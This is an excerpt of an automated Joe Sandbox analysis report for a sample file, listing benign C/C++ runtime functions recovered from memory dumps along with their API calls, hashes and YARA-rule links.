Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cffa64d000bd6436ea9d83ec169476a4b06b7eca58a2642f1b738212b0f3c982
Instruction ID: 51501511507624930fb2c256a160def31b993965b5d156db49eb478cdc4cb844
Opcode Fuzzy Hash: cffa64d000bd6436ea9d83ec169476a4b06b7eca58a2642f1b738212b0f3c982
Instruction Fuzzy Hash: 3E014431504795AFDB11AF51DC49BBEBBB8FB44B14F040529F811E6390DB74A904CAA0

Function 00E01BA0 Relevance: 7.8, APIs: 5, Instructions: 297COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E01C27
_memset.LIBCMT ref: 00E01C38
_memset.LIBCMT ref: 00E01D00
_memset.LIBCMT ref: 00E01D6C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E01E8E

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2583058844-0
Opcode ID: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
Instruction ID: 10fd2dea5c42687dc32271517f6bcb968e512b3ca106d47d2fc6a2637aeb205b
Opcode Fuzzy Hash: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
Instruction Fuzzy Hash: 8BC118B2E0021AABCF21EB64DC85AED77BDEF08304F1151E1FA09B6150DB359B858F61

Function 00E11B0F Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 00E11B23
__init_pointers.LIBCMT ref: 00E11BD5
__calloc_crt.LIBCMT ref: 00E11C43
__initptd.LIBCMT ref: 00E11C68

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: __calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 3132042578-0
Opcode ID: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction ID: 3677f7c9fd4f9d6f12da6088b1cff56e9feeeca1e0d7e2c526ac8a0083677072
Opcode Fuzzy Hash: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction Fuzzy Hash: 58318B35C043509ACB22AF79AD48A853BA0EF44765F10267AE500E32B1EFB5C480CF89

Function 00E0CA1A Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 00E0CA63
DName::operator+.LIBCMT ref: 00E0CA6A
DName::DName.LIBCMT ref: 00E0CA8C
DName::operator+.LIBCMT ref: 00E0CA93
DName::operator+.LIBCMT ref: 00E0CA9A

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
Instruction ID: 4f3ced38e45a1ef10f2675d566768d00042eee6328c5caa6aa589489ed447edb
Opcode Fuzzy Hash: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
Instruction Fuzzy Hash: 01016130600209AFCF14EBA4DC42EED7BB5EF48708F105155F506AB2D2DB70E9858B84

Function 00DC4436 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DC4442
int.LIBCPMT ref: 00DC4455

Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF

std::_Facet_Register.LIBCPMT ref: 00DC4488
std::_Lockit::~_Lockit.LIBCPMT ref: 00DC449E
Concurrency::cancel_current_task.LIBCPMT ref: 00DC44A9

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b444eb98bff9b9aab1bd92e67dbd134f564bc5c861be8b409b15a18f40710020
Instruction ID: 251adb8d60a02266e17f8e568dc9b6d716ece678bfdb2d81503da3e040d28531
Opcode Fuzzy Hash: b444eb98bff9b9aab1bd92e67dbd134f564bc5c861be8b409b15a18f40710020
Instruction Fuzzy Hash: 19012B7A500126EBCB19EB54D815FAD7B68EF81760B34015DF805A7291EF70DE02C7B0

Function 00DC4308 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DC4315
int.LIBCPMT ref: 00DC4328

Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF

std::_Facet_Register.LIBCPMT ref: 00DC435B
std::_Lockit::~_Lockit.LIBCPMT ref: 00DC4371
Concurrency::cancel_current_task.LIBCPMT ref: 00DC437C

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b2d0ba450194c1948ded9f8a4d3e98f5ebde7ead527af31a72d170cc0edd8610
Instruction ID: 9b6583d080fc5a23891ed4d578ff49980433a79448189602f832d7852cd343cd
Opcode Fuzzy Hash: b2d0ba450194c1948ded9f8a4d3e98f5ebde7ead527af31a72d170cc0edd8610
Instruction Fuzzy Hash: F201A736940526ABCB15BF64E815EDD7774EFC1760B14015DF801A7291DF349E06CBB0

Function 00DC507A Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00DC5081
std::_Lockit::_Lockit.LIBCPMT ref: 00DC508C
std::locale::_Setgloballocale.LIBCPMT ref: 00DC50A7
_Yarn.LIBCPMT ref: 00DC50BD
std::_Lockit::~_Lockit.LIBCPMT ref: 00DC50FA

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
String ID:
API String ID: 156189095-0
Opcode ID: 9de997c768efbb474adc4ad8d48e5291dcd4cf86fd04a94ab6091726fd0c38f9
Instruction ID: 44765dc6d0b6502e21a8f4e3b31399bbee126c0943c5241dcb5ea238a9219e7b
Opcode Fuzzy Hash: 9de997c768efbb474adc4ad8d48e5291dcd4cf86fd04a94ab6091726fd0c38f9
Instruction Fuzzy Hash: 85015A79A006529FD70ABB20A85AF7C7BA1FF85350B28400DF94157381CB34AE46DFB6

Function 00E14FAE Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00E14FBA

Part of subcall function 00E1194C: __getptd_noexit.LIBCMT ref: 00E1194F
Part of subcall function 00E1194C: __amsg_exit.LIBCMT ref: 00E1195C

__calloc_crt.LIBCMT ref: 00E14FC5
__lock.LIBCMT ref: 00E14FFB
___addlocaleref.LIBCMT ref: 00E15007
__lock.LIBCMT ref: 00E1501B

Part of subcall function 00E10AEC: __getptd_noexit.LIBCMT ref: 00E10AEC

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 2820776222-0
Opcode ID: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
Instruction ID: 29e53b952f8137c824643e7b1a9c3888b0c5bf99fbece963e23d231c5737cfea
Opcode Fuzzy Hash: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
Instruction Fuzzy Hash: FA018472541709EEEB20BFB49803B9C77E0AF44720F206659F4A4BB6C2CB7449C1DB56

Function 00E13711 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00E1371D

Part of subcall function 00E1194C: __getptd_noexit.LIBCMT ref: 00E1194F
Part of subcall function 00E1194C: __amsg_exit.LIBCMT ref: 00E1195C

__getptd.LIBCMT ref: 00E13734
__amsg_exit.LIBCMT ref: 00E13742
__lock.LIBCMT ref: 00E13752
__updatetlocinfoEx_nolock.LIBCMT ref: 00E13766

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction ID: 55478a1df3cc07245d1b4fd66c0ea7caffef4d790f3366837ffdc3c31959c9a1
Opcode Fuzzy Hash: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction Fuzzy Hash: 8AF02BB2940304ABD721FB745803BCE32D06F00724F15351AF050775D2CB245AC0DA5A

Function 00DCB3A2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DCB353,00000000,?,00E4ECD4,?,?,?,00DCB4F6,00000004,InitializeCriticalSectionEx,00DE4BD8,InitializeCriticalSectionEx), ref: 00DCB3AF
GetLastError.KERNEL32(?,00DCB353,00000000,?,00E4ECD4,?,?,?,00DCB4F6,00000004,InitializeCriticalSectionEx,00DE4BD8,InitializeCriticalSectionEx,00000000,?,00DCB2AD), ref: 00DCB3B9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DCB3E1

Strings

api-ms-, xrefs: 00DCB3C6

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 2439801e1f122bc8bdd5f1698039a8c0b3e3419e216f9c902a36f55539573df7
Instruction ID: f7faad4f86741907515a9449b4db9e080a83bb7e2654d44d21186b87b31b094f
Opcode Fuzzy Hash: 2439801e1f122bc8bdd5f1698039a8c0b3e3419e216f9c902a36f55539573df7
Instruction Fuzzy Hash: 38E012302403C5B7EA112FB1EC8AF293A549B00B61F144026FA0CE91E1D761DA5086B4

Function 00DD7747 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(1539EB79,00000000,00000000,00000000), ref: 00DD77AA

Part of subcall function 00DD952A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00DD8FD3,?,00000000,-00000008), ref: 00DD95D6

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DD7A05
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DD7A4D
GetLastError.KERNEL32 ref: 00DD7AF0

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: e4ded300f1f8064f1b8a7746228115bdd597ea7e0756ffeb4defef5f23060d62
Instruction ID: 5aeba081308692f9932249bed896faa95bc318691f5e22f3a81bd944a585752e
Opcode Fuzzy Hash: e4ded300f1f8064f1b8a7746228115bdd597ea7e0756ffeb4defef5f23060d62
Instruction Fuzzy Hash: FED16975E04258AFCB15CFA8D8809ADBBB5FF49304F18416AE859EB351E730A946CF60

Function 00DFB05E Relevance: 6.3, APIs: 4, Instructions: 325COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DFB08F
_memset.LIBCMT ref: 00DFB0AF
_memset.LIBCMT ref: 00DFB0C0
_memset.LIBCMT ref: 00DFB0D1

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
Instruction ID: ea857eb7879d0bed8631b85f759a196f4de18a88e7998a8b279b4a7aeca954ab
Opcode Fuzzy Hash: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
Instruction Fuzzy Hash: EFD1C47291012DAADB20EB94DC82AE9B7B9EF04304F1554E7A608B3051DA707F89CFB1

Function 00DCA371 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00DCA438
___AdjustPointer.LIBCMT ref: 00DCA45B
___AdjustPointer.LIBCMT ref: 00DCA4F7

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5b7ff6192cc3806aaeeb37e8801c163556dcdbae88a8e1bd6715eef191492ac8
Instruction ID: 20f40045e5df1772ee4045cc623631fa7dfcbb2eeddb24ff76c1212be2d76fbe
Opcode Fuzzy Hash: 5b7ff6192cc3806aaeeb37e8801c163556dcdbae88a8e1bd6715eef191492ac8
Instruction Fuzzy Hash: 9F51267260820B9FDB298F98D845F7A77B4EF00318F28452DE84987291E771EC41DBB2

Function 00E05259 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E0527E
_memset.LIBCMT ref: 00E0528D
_memset.LIBCMT ref: 00E0544D
_memset.LIBCMT ref: 00E0545F

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
Instruction ID: a5ac14e05aace89f8723af4cd375242c4c7b2f050e61ce3885424b6389a489fa
Opcode Fuzzy Hash: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
Instruction Fuzzy Hash: 4B51CAB1E4026E9BCB21EF24CC82ADDB3BDEB04704F4251E5A718B3151DA346F868F64

Function 00E03395 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E033BA
_memset.LIBCMT ref: 00E0342E
_memset.LIBCMT ref: 00E034A2
_memset.LIBCMT ref: 00E03516

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
Instruction ID: 8f22dbd44f2a82ecb83fe7c60ebec10c569068ea5973f16d9145a4275d7af15e
Opcode Fuzzy Hash: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
Instruction Fuzzy Hash: 4841A371D4021CBADB14FB60DC47FDD77B8EB08700F2494A5B605A7090EAB5AB888FA1

Function 00E139AD Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00E139B9

Part of subcall function 00E1194C: __getptd_noexit.LIBCMT ref: 00E1194F
Part of subcall function 00E1194C: __amsg_exit.LIBCMT ref: 00E1195C

__amsg_exit.LIBCMT ref: 00E139D9
__lock.LIBCMT ref: 00E139E9
_free.LIBCMT ref: 00E13A19

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
Instruction ID: 3ce10652a8950d72996287bf25eea4c24de180664f8138ca49c06b51137097dc
Opcode Fuzzy Hash: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
Instruction Fuzzy Hash: 3A01D232E01715ABCB21AF38A80679D77A0BF04729F053126E850776D2C7346EC1CBD6

Function 00DE06EF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000), ref: 00DE0706
GetLastError.KERNEL32(?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000,00000000,00000000,?,00DD80CB,00000000), ref: 00DE0712

Part of subcall function 00DE06D8: CloseHandle.KERNEL32(FFFFFFFE,00DE0722,?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000,00000000,00000000), ref: 00DE06E8

___initconout.LIBCMT ref: 00DE0722

Part of subcall function 00DE069A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DE06C9,00DDF700,00000000,?,00DD7B44,00000000,00000000,00000000,00000000), ref: 00DE06AD

